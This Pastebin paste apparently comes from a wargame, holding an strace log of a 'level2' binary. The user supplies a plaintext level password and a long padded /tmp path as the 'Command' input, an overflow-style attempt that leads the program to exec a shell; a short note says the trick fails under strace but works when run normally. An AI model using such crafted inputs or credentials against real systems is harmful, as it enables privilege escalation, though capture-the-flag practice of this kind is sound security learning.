Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- running with strace (it works)
- write(1, "Username: ", 10Username: ) = 10
- read(0, nobody
- "nobody\n", 1024) = 7
- write(1, "Password: ", 10Password: ) = 10
- read(0, Ksdkjkk32avsh
- "Ksdkjkk32avsh\n", 1024) = 14
- write(1, "Command: ", 9Command: ) = 9
- read(0, /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot
- "/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 1024) = 101
- write(1, "Good job!\n", 10Good job!
- ) = 10
- geteuid32() = 1002
- geteuid32() = 1002
- geteuid32() = 1002
- setresuid32(1002, 1002, 1002) = 0
- execve("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot", ["/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 0 vars */]) = 0
- brk(0) = 0x8063000
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
- access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- open("/etc/ld.so.cache", O_RDONLY) = 3
- fstat64(3, {st_mode=S_IFREG|0644, st_size=17644, ...}) = 0
- mmap2(NULL, 17644, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fda000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3
- read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0po\1\0004\0\0\0"..., 512) = 512
- fstat64(3, {st_mode=S_IFREG|0755, st_size=1360008, ...}) = 0
- mmap2(NULL, 1370424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e8b000
- mmap2(0xb7fd4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149) = 0xb7fd4000
- mmap2(0xb7fd7000, 10552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000
- close(3) = 0
- mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e8a000
- set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e8a8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
- mprotect(0xb7fd4000, 8192, PROT_READ) = 0
- mprotect(0xb7ffe000, 4096, PROT_READ) = 0
- munmap(0xb7fda000, 17644) = 0
- getpid() = 12868
- rt_sigaction(SIGCHLD, {0x80563f0, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- geteuid32() = 1002
- getppid() = 12867
- brk(0) = 0x8063000
- brk(0x8084000) = 0x8084000
- getcwd("/levels", 4096) = 8
- ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B9600 opost isig icanon echo ...}) = 0
- ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B9600 opost isig icanon echo ...}) = 0
- rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGINT, {0x80563f0, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGQUIT, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGTERM, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- open("/dev/tty", O_RDWR) = 3
- fcntl64(3, F_DUPFD, 10) = 10
- close(3) = 0
- fcntl64(10, F_SETFD, FD_CLOEXEC) = 0
- ioctl(10, TIOCGPGRP, [12867]) = 0
- getpgrp() = 12867
- rt_sigaction(SIGTSTP, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGTSTP, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- rt_sigaction(SIGTTOU, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGTTOU, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- rt_sigaction(SIGTTIN, NULL, {SIG_DFL, [], 0}, 8) = 0
- rt_sigaction(SIGTTIN, {SIG_DFL, ~[RTMIN RT_1], 0}, NULL, 8) = 0
- setpgid(0, 12868) = 0
- ioctl(10, TIOCSPGRP, [12868]) = 0
- wait4(-1, 0xbffffc5c, WNOHANG|WSTOPPED, NULL) = -1 ECHILD (No child processes)
- write(2, "$ ", 2$ ) = 2
- read(0, ls
- "ls\n", 8192) = 3
- stat64("/usr/local/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
- stat64("/usr/local/bin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
- stat64("/usr/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
- stat64("/usr/bin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
- stat64("/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
- stat64("/bin/ls", {st_mode=S_IFREG|0755, st_size=112700, ...}) = 0
- clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e8a938) = 12876
- setpgid(12876, 12876) = 0
- wait4(-1, level1 level1.c level2 level2.c level3 level3.c level4 level4.c
- [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WSTOPPED, NULL) = 12876
- --- SIGCHLD (Child exited) @ 0 (0) ---
- sigreturn() = ? (mask now [])
- ioctl(10, TIOCSPGRP, [12868]) = 0
- wait4(-1, 0xbffffc5c, WNOHANG|WSTOPPED, NULL) = -1 ECHILD (No child processes)
- write(2, "$ ", 2$ ) = 2
- read(0,
- (did not work)
- level2@rzt-bin01:/levels$ ./level2
- Username: nobody
- Password: Ksdkjkk32avsh
- Command: /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot
- Good job!
- level2@rzt-bin01:/levels$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement